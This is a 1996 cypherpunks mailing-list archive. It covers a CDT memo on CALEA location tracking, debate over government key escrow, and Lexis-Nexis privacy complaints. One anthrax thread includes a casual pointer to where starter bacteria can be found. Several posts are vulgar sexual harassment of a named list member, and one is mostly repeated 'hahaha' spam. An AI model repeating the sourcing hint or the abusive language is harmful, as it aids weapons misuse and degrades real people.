physical location of a mobile facility or service beyond that associated with the number's area code or exchange.'" (Testimony of FBI director Louis Freeh before a joint hearing of the House Judiciary Subcommittee on Civil and Constitutional Rights and the Senate Judiciary Subcommittee on Technology and the Law, March 18, 1994. S. Hrg 103-1022). The drafters of CALEA noted in the Committee report that the statute was not designed to expand law enforcement surveillance ability: "The FBI director testified that the legislation was intended to preserve the status quo, that it was intended to provide law enforcement no more and no less access to information than it had in the past. The Committee urges against over broad interpretation of the requirements." (House Judiciary Committee Report to Accompany H.R. 4922. Rept. 103-827 Part 1, page 22) The FBI's demand that all wireless communications equipment provide the physical locations of a subscriber at all times goes raises obvious privacy issues and goes well beyond the scope of CALEA and the explicit statements of the FBI. No Funds Should Be Appropriated to Implement CALEA Until This Issue is Resolved In passing CALEA, Congress sought to preserve law enforcement's ability to conduct electronic surveillance as new communications technologies are developed. At the same time, Congress was very clear that the law was designed to preserve the status quo and not to expand law enforcement surveillance authority. In addition, Congress took the extra step of including substantial Congressional oversight and public accountability to the implementation process in order to ensure that law enforcement did not overreach and that privacy interests would be protected. The law requires the telecommunications industry to set standards for meeting the FBI's general requirements in an open process, allows interested parties to challenge any standard before the FCC if it fails to protect privacy, and requires Congressional oversight and accountability over the implementation of the law by mandating government reimbursement for expensive capability upgrades. We urge Congress to exercise its oversight role to determine whether in fact the FBI is seeking to use CALEA to expand its current surveillance capabilities contrary to the intent of the law. Unless and until the FBI clarifies its intent and justifies its demands, Congress should not allow the expenditure of any funds to implement CALEA. We look forward to discussing this issue with you further. If you have any questions please contact: Center for Democracy and Technology +1.202.637.9800 Danny Weitzner, Deputy Director Jonah Seiger, Policy Analyst ----------------------------------------------------------------------- (3) SUBSCRIPTION INFORMATION Be sure you are up to date on the latest public policy issues affecting civil liberties online and how they will affect you! Subscribe to the CDT Policy Post news distribution list. CDT Policy Posts, the regular news publication of the Center For Democracy and Technology, are received by nearly 10,000 Internet users, industry leaders, policy makers and activists, and have become the leading source for information about critical free speech and privacy issues affecting the Internet and other interactive communications media. To subscribe to CDT's Policy Post list, send mail to policy-posts-request at cdt.org with a subject: subscribe policy-posts If you ever wish to remove yourself from the list, send mail to the above address with a subject of: unsubscribe policy-posts ----------------------------------------------------------------------- (4) ABOUT THE CENTER FOR DEMOCRACY AND TECHNOLOGY/CONTACTING US The Center for Democracy and Technology is a non-profit public interest organization based in Washington, DC. The Center's mission is to develop and advocate public policies that advance democratic values and constitutional civil liberties in new computer and communications technologies. Contacting us: General information: info at cdt.org World Wide Web: URL:http://www.cdt.org/ FTP URL:ftp://ftp.cdt.org/pub/cdt/ Snail Mail: The Center for Democracy and Technology 1634 Eye Street NW * Suite 1100 * Washington, DC 20006 (v) +1.202.637.9800 * (f) +1.202.637.0968 ----------------------------------------------------------------------- End Policy Post 2.32 9/20/96 ----------------------------------------------------------------------- From unicorn at schloss.li Fri Sep 20 13:52:47 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 21 Sep 1996 04:52:47 +0800 Subject: Fear of Flying -- from HotWired In-Reply-To: <199609190446.VAA04571@netcom8.netcom.com> Message-ID: On Wed, 18 Sep 1996, Bill Frantz wrote: > At 2:51 PM 9/18/96 -0400, Black Unicorn wrote: > >> >Culturing and growing anthrax is painfully simple. No DNA required. > >> > >> Sorry Unicorn, you missed my point. (1) You need DNA to grow bacteria. > >> You can get the DNA two ways. (A) You get a sample of the beast, or (B) > >> You get a DNA sequence and then regenerate the DNA. (I don't think B is > >> technically feasable yet.) (2) You can't send samples of the beast thru > >> the net. > > > >I think your point was that the net was not responsible for the > >proliferation of Anthrax development data. (Am I wrong?) > > My point was that you need more than just information (but see below). You > also need some materials that may be hard to get. Being totally ignorant > in the anthrax growing area, I have no idea where I would get my starter > bacteria. (Presumably any net-info would tell me. I haven't looked.) Any of several cow pastures in the midwest. -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From dlv at bwalk.dm.com Fri Sep 20 13:57:42 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 04:57:42 +0800 Subject: The periodic caveat about Timmy May In-Reply-To: Message-ID: >From DMiskell at envirolink.org Fri Sep 20 10:22:57 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 11:09:08 EDT for dlv Received: from uhost1.servtech.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA16482 for dlv at bwalk.dm.com; Fri, 20 Sep 96 10:22:57 -0400 Received: from mocha.hotliquid.com (mocha.hotliquid.com [204.249.118.9]) by uhost1.servtech.com (8.7.6/8.7.3) with SMTP id OAA03529; Fri, 20 Sep 1996 14:22:53 GMT Received: from [150.160.45.150] by mocha.hotliquid.com (SMI-8.6/SMI-SVR4) id KAA03478; Fri, 20 Sep 1996 10:18:02 -0400 X-Sender: darius at hotliquid.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 20 Sep 1996 09:38:26 -0500 To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) From: DMiskell at envirolink.org (Daniel Christopher Miskell) Subject: Re: The periodic caveat about Timmy May Cc: cypherpunks at toad.com >attila writes: > >> In <199609190517.HAA00851 at basement.replay.com>, on 09/19/96 >> at 07:17 AM, nobody at flame.alias.net (Anonymous) said: >> >> = .Timmy May habitually digs into his cesspool of a mind for his >> = .mailing list fertilizer. >> >> this is humour. it tickles the imagination, and the reference >> to tim is lost! > >Can we get all this non-crypto-relevant shit off of this mailing list please? > >--- > >Dr.Dimitri Vulis KOTM >Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps Sorry, dear, but complaining isn't going to change it, and simple telling people to shut the fuck up is going to go nowhere. If you want solely crypto relevent material, subscribe to the filtered list. I mean, come on -- you know this list is suseptable (sp?) to noise and spam. Besides, people suggest to me that you are the anonymous mailer. So maybe you should keep a low profile on this. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From dlv at bwalk.dm.com Fri Sep 20 14:01:56 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 05:01:56 +0800 Subject: CIA hacked In-Reply-To: Message-ID: >From DMiskell at envirolink.org Fri Sep 20 10:26:25 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 11:09:09 EDT for dlv Received: from uhost1.servtech.com by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA16770 for dlv at bwalk.dm.com; Fri, 20 Sep 96 10:26:25 -0400 Received: from mocha.hotliquid.com (mocha.hotliquid.com [204.249.118.9]) by uhost1.servtech.com (8.7.6/8.7.3) with SMTP id OAA03565; Fri, 20 Sep 1996 14:26:20 GMT Received: from [150.160.45.150] by mocha.hotliquid.com (SMI-8.6/SMI-SVR4) id KAA03490; Fri, 20 Sep 1996 10:21:30 -0400 X-Sender: darius at hotliquid.com Message-Id: Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Fri, 20 Sep 1996 09:41:54 -0500 To: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) From: DMiskell at envirolink.org (Daniel Christopher Miskell) Subject: Re: CIA hacked Cc: tcmay at got.net >>From remailer at mailhub.bart.nl Thu Sep 19 13:18:03 1996 >Received: by bwalk.dm.com (1.65/waf) > via UUCP; Thu, 19 Sep 96 16:10:20 EDT > for dlv >Received: from spoof.bART.nl by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) >via SMTP; > id AA03960 for dlv at bwalk.dm.com; Thu, 19 Sep 96 13:18:03 -0400 >Received: (from remailer at localhost) by spoof.bart.nl (8.7.5/8.6.8) id >TAA28972 for dlv at bwalk.dm.com; Thu, 19 Sep 1996 19:19:58 +0200 (MET DST) >Date: Thu, 19 Sep 1996 19:19:58 +0200 (MET DST) >Message-Id: <199609191719.TAA28972 at spoof.bart.nl> >To: dlv at bwalk.dm.com >From: remailer at 2005.bart.nl (Anonymous) >Comments: Please report misuse of this automated remailing service to > > The contents of this message are neither approved or > condoned by nl.com or our host bART Internet. > *** Replying to it will not send your reply to the sender *** > There is no way to determine the originator of this message. If you wish >to be blocked from receiving all anonymous mail, send your request to the > mailing list. The operator of this particular >remailer can be reached at >Subject: Re: CIA hacked > >Return-Path: >To: cypherpunks at toad.com >Subject: Re: CIA hacked >From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) >Comments: Dole/Kemp '96! >Date: Thu, 19 Sep 96 08:08:39 EDT >Organization: Brighton Beach Boardwalk BBS, Forest Hills, N.Y. >Sender: owner-cypherpunks at toad.com > >Mike van der Merwe writes: >> I'm sure we will find out in a few years that Microsoft invented the >> Net. Or brought it to the masses. Or saved it from a certain and >> early demise. Or all of the above. >> JAMES SEYMOUR > >>Dr. John M. Grubor created the 'net. > >Who created you? You tub of shit? Dude, why do you even bother? It is simply not constructive to keep insulting and stabbing at people. You gripe about the non-crypto-relevent stuff, then you go and create it repeatedly. If you don't like what people have to say, take your potty mouth to another list. Daniel. -- If in fact we are the only intelligent life on this planet, why the fuck are we in this goddamn mess? -- Find my public key on the World Wide Web -- point your browser at: http://bs.mit.edu:8001/pks-toplev.html From dougr at skypoint-gw.globelle.com Fri Sep 20 14:07:17 1996 From: dougr at skypoint-gw.globelle.com (Douglas B. Renner) Date: Sat, 21 Sep 1996 05:07:17 +0800 Subject: Paradox: NO OPPRESSION IN AMERICA Message-ID: Those of you who took Logic 1001 will recall the paradox known as "The Heap" which goes like this: 1. A single grain of sand does not constitute a heap of sand. 2. You can create a heap from a non-heap by adding a single grain of sand. 3. Therefore, there is *NO SUCH THING* as a heap of sand. You with me here? Okay, this is important, because the public actually does think like this: 1. Our current society in America is not oppressive. (generally accepted) 2. You cannot change a non-oppressive society into an oppressive society by removing one liberty from its citizens. (also generally accepted) 3. Therefore, it is not possible for America to become an oppressive society. Sleep well, Douglas B. Renner From isptv at access.digex.net Fri Sep 20 14:07:38 1996 From: isptv at access.digex.net (ISP-TV Main Contact) Date: Sat, 21 Sep 1996 05:07:38 +0800 Subject: Declan McCullagh interview on ISP-TV Monday Night Message-ID: <199609201816.OAA22813@access5.digex.net> *** ISP-TV Program Announcement: Declan McCullagh Interview *** Monday, Sept. 23 9:00 PM ET Online activist Declan McCullagh runs the Justice on Campus project, is a plaintiff in the ACLU/EFF court challenge to the Communications Decency Act, and maintains the Fight-Censorship mailing list. He also writes for WIRED/HotWired, and recently described the CDA trial to readers of Playboy Magazine. Our chat with Declan will include details of international Internet censorship, his discoveries concerning what some "Safe Surf" products actually protect you from, the difference between "indecent" and "harmful to minors" in new Internet censorship laws, as well as your phoned-in questions. This video interview can be viewed on the ISP-TV main CU-SeeMe reflector at IP 205.197.247.33, or other ISP-TV affiliate reflectors listed at http://www.digex.net/isptv/members.html See URL http://www.digex.net/isptv for more information about the ISP-TV Network From nobody at cypherpunks.ca Fri Sep 20 14:12:56 1996 From: nobody at cypherpunks.ca (John Anonymous MacDonald) Date: Sat, 21 Sep 1996 05:12:56 +0800 Subject: A daily warning regarding Tim C[ocksucker] Maya, the lying sack of shit Message-ID: <199609201738.KAA00561@abraham.cs.berkeley.edu> Tim C[ocksucker] Maya studied yoga back-streching exercises for five years so he could blow himself (nobody else will). From froomkin at law.miami.edu Fri Sep 20 14:33:47 1996 From: froomkin at law.miami.edu (Michael Froomkin - U.Miami School of Law) Date: Sat, 21 Sep 1996 05:33:47 +0800 Subject: The GAK Momentum is Building... In-Reply-To: <3240DD33.28B6@gte.net> Message-ID: In this context, I'm just about to revise the draft at http://www.law.miami.edu/~froomkin/articles/planet_clipper.htm comments welcome. **Benjamin Bradley Froomkin, b. Sept. 13, 1996, 8 lbs 14.5oz 21.5"** A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax) Associate Professor of Law | U. Miami School of Law | froomkin at law.miami.edu P.O. Box 248087 | http://www.law.miami.edu/~froomkin Coral Gables, FL 33124 USA | It's hot here. And humid. From Ryan.Russell at sybase.com Fri Sep 20 14:37:02 1996 From: Ryan.Russell at sybase.com (Ryan Russell/SYBASE) Date: Sat, 21 Sep 1996 05:37:02 +0800 Subject: CNET Digital Dispatch Vol. 2 No. 38 Message-ID: <9609201840.AA19437@notesgw2.sybase.com> EDS is a large company Perot used to own.. I worked for them for a short time...a very short time.. Ryan ---------- Previous Message ---------- To: cypherpunks cc: From: osborne @ gateway.grumman.com (Rick Osborne) @ smtp Date: 09/20/96 02:12:22 AM Subject: CNET Digital Dispatch Vol. 2 No. 38 This week's c|net digital dispatch had the following top ten list. For number 8, did they mean DES or is the EDS something I'm not aware of. I figure it has to be because what does DES have to do with chat rooms? >9. TOP TEN REASONS WHY THE PRESIDENTIAL DEBATES WON'T TAKE >PLACE ON THE WEB > >10. Kemp would fight with Dole over who gets to > "quarterback" the keyboard. >9. Oops: Gore plugged information superhighway cable > into White House central vacuum system. >8. Perot's crack team of EDS hackers would get him > in somehow. >7. Hotwired editors say presidential candidates not > hip enough. >6. Hillary doesn't let the President in ANY chat rooms. >5. Debate commission insists: event must be on Prodigy. >4. Bill Gates owns the rights to online debates. >3. Dole's Selectric won't connect to the Net. >2. Chelsea is using the White House PC to write a > book report. >1. In cyberspace, no one can feel your pain. ____________________________________________________________ Rick Osborne osborne at gateway.grumman.com "The universe doesn't give you any points for doing things that are easy." From unicorn at schloss.li Fri Sep 20 14:41:55 1996 From: unicorn at schloss.li (Black Unicorn) Date: Sat, 21 Sep 1996 05:41:55 +0800 Subject: The GAK Momentum is Building... In-Reply-To: <3240DD33.28B6@gte.net> Message-ID: On Wed, 18 Sep 1996, Dale Thorn wrote: > Lucky Green wrote: > > On Wed, 18 Sep 1996, Jim Ray wrote: > > I agree, and hope so. "Key Recovery," while not as Orwellian-sounding > > as "GAK," is a step on the path to honesty WRT the English language, > > though it's important to continually point out, as Tim did in his > > post, that *access* -- rather than just recovery -- is obviously what > > Mr. Freeh wants. > > I'd count this likely change in terminology as a "cypherpunk victory," > > albeit a very small and certainly a very hard-fought one. > > > Nope. It is a Cypherpunk loss. The use of the term "key recovery" for > > GAK now fully obfuscates the distinction between accessing a > > backup copy by the legitimate owner (or his estate, employer, etc.) > > and GAK. Many PKIs will support the former type of key recovery. And > > for good reasons. Thanks to the brainwashers using the same term for > > GAK, it will now become impossible to tell from a basic description of > > a PKI if it supports GAK or not. Furthermore, those who oppose the > > latter type of key recovery (us!), will be pushed further into the > > fringe by the media now being able to mix up our arguments against GAK > > with arguing against true key recovery. [Do you notice the weird > > constructs I have to use to distinguish the two meanings? One of them > > being new...] > > --Lucky > > My comment: Once the big Corp.'s get used to the new game, they'll put > the non-critical stuff out there for Mr. Freeh, and for the really > secret data, if the cops confiscate anything they can't read, the Corp. > security will put it off on a fall-guy, even as high as the CEO if > necessary. I just wanna see one case where a federal judge will try to > bleed a big company for contempt for "refusing" to decode and hand over > some ostensibly encrypted data. Matter of fact, there are probably cases > similar to this that have already been through the appeals courts. Several. Most involve foreign banks refusing to turn over records to U.S. courts. Most result in powerfully large fines imposed on banks, often on a per diem basis. > > -- I hate lightning - finger for public key - Vote Monarchist unicorn at schloss.li From JUDGExMAD at aol.com Fri Sep 20 14:45:33 1996 From: JUDGExMAD at aol.com (JUDGExMAD at aol.com) Date: Sat, 21 Sep 1996 05:45:33 +0800 Subject: cxcxcx Message-ID: <960920142041_526657182@emout12.mail.aol.com> unscribe cypherpunks at toad.com From lharrison at csbh.mhv.net Fri Sep 20 14:49:55 1996 From: lharrison at csbh.mhv.net (Lynne L. Harrison) Date: Sat, 21 Sep 1996 05:49:55 +0800 Subject: ANYONES CREDIT CARD # per your request. Message-ID: <9609201825.AA18161@super.mhv.net> At 11:03 AM 9/20/96 EDT, Brian Hills wrote: >Thought this would be appropriate to the list >>Unfortunately, this message needs to be propagated to protect all of us. >> >> Note: Lexis-Nexis is only accepting written or fax requests. You can go to their web page (http://www.lexis-nexis.com), click "Just In" and request via email that your name be removed from their database by filling out the form. Problem, of course, is that one doesn't know if one's name and info is in the database unless one is a subscriber and can look it up. I, personally, do not feel comfortable in filling out a form with my personal info and sending it along - 1) for the obvious reasons; and 2) what if I'm not even in their nefarious database? If not, then I've just entered my personal info and sent it on its merry way to whomever and wherever unnecessarily - whether by email, fax, or snail mail. I tried just entering my name, email address, and state but, as anticipated, received a msg that ALL info has to be supplied, so I'll chk with someone I know that has an account to see if my name is there. However, the BIGGEST problem I foresee with this database (and others like it) is that someone eventually is going to hack it - and then watch the fun and games ensue. ********************************************************** Lynne L. Harrison, Esq. | "The key to life: Poughkeepsie, New York | - Get up; lharrison at mhv.net | - Survive; http://www.dueprocess.com | - Go to bed." DISCLAIMER: I am not your attorney; you are not my client. Accordingly, the above is *NOT* legal advice. ********************************************************** From aba at dcs.ex.ac.uk Fri Sep 20 15:06:10 1996 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sat, 21 Sep 1996 06:06:10 +0800 Subject: monkey-wrenching GAK In-Reply-To: Message-ID: <199609201023.LAA00097@server.test.net> Tim May writes on cpunks: > Ray Arachellian writes: > >Another thing you can do: generate huge key pairs all day long and submit > >them to the NSA. If enough people do this, they will be flooded and > >overworked [...] > > Ah, but what about the _fee_ for registering a key? You really didn't think > this would be free, did you? I agree. With the aim of enforcing True Names, this might also get tied to an internet drivers license (and your fingerprints (the physical kind), social security number etc, much like car DLs (from the other thread)). > (Note: One of my biggest objections to GAK, besides the political/civil > rights issue, is what it does to systems which generate lots and lots of > keys on an ad hoc, continuing basis. Yeah, kind of wrecks all the current uses of forward secrecy, DH in IP link level encryption; temporary RSA keys, and DH used by SSL, and so on. The fact that these things are currently in world wide use on a large scale presents the US law enforcement with problems. They'd need to "unpublish", and recall a *lot* of software. Some of the non-US folks might not be so keen to do a GAK enabling downgrade. Adam -- exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ #!/bin/perl -sp0777i Message-ID: Dimitri, get a life! We need Dimitri Spams as much as we needed Perrygrams. Which is to say, we need them not at all! ============================================================================= + ^ + | Ray Arachelian |FL| KAOS KERAUNOS KYBERNETOS |==/|\== \|/ |sunder at brainlink.com|UL|__Nothing_is_true,_all_is_permitted!_|=/\|/\= <--+-->| ------------------ |CG|What part of 'Congress shall make no |=\/|\/= /|\ | Just Say "No" to |KA|law abridging the freedom of speech' |==\|/== + v + | Janet Reno & GAK |AK| do you not understand? |======= ===================http://www.brainlink.org/~sunder/========================= ActiveX! ActiveX! Format Hard drive? Just say yes! From peter at internetelite.com Fri Sep 20 15:13:00 1996 From: peter at internetelite.com (Peter Hrabinsky) Date: Sat, 21 Sep 1996 06:13:00 +0800 Subject: -- Message-ID: <3242DB00.30B5@internetelite.com> From dlv at bwalk.dm.com Fri Sep 20 15:28:20 1996 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 21 Sep 1996 06:28:20 +0800 Subject: [joke, non-code] Re: Get this for a snake-oil example : In-Reply-To: <843230178.6534.0@fatmans.demon.co.uk> Message-ID: >From paul at fatmans.demon.co.uk Fri Sep 20 10:51:21 1996 Received: by bwalk.dm.com (1.65/waf) via UUCP; Fri, 20 Sep 96 11:09:22 EDT for dlv Received: from relay-4.mail.demon.net by uu.psi.com (5.65b/4.0.061193-PSI/PSINet) via SMTP; id AA19108 for dlv at bwalk.dm.com; Fri, 20 Sep 96 10:51:21 -0400 Received: from post.demon.co.uk ([(null)]) by relay-4.mail.demon.net id ad15131; 20 Sep 96 14:41 GMT Received: from fatmans.demon.co.uk ([158.152.120.223]) by relay-3.mail.demon.net id aa06534; 20 Sep 96 15:36 BST Received: from fatmans.demon.co.uk by fatmans.demon.co.uk with SMTP id AA843156112 ; Thu, 19 Sep 96 18:01:52 +0000 Comments: Authenticated sender is From: paul at fatmans.demon.co.uk To: "Dr.Dimitri Vulis KOTM" Date: Thu, 19 Sep 1996 18:01:50 +0000 Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7BIT Subject: Re: [joke, non-code] Re: Get this for a snake-oil example : Priority: normal X-Mailer: Pegasus Mail for Windows (v2.31) Message-Id: <843230178.6534.0 at fatmans.demon.co.uk> > > Shamster: SHA-enabled biocomputing hamster. > > I'm sure Timmy would like to wrap one up in duct tape and shove it > up his ass... How witty and subtle Hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha hahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahahaha 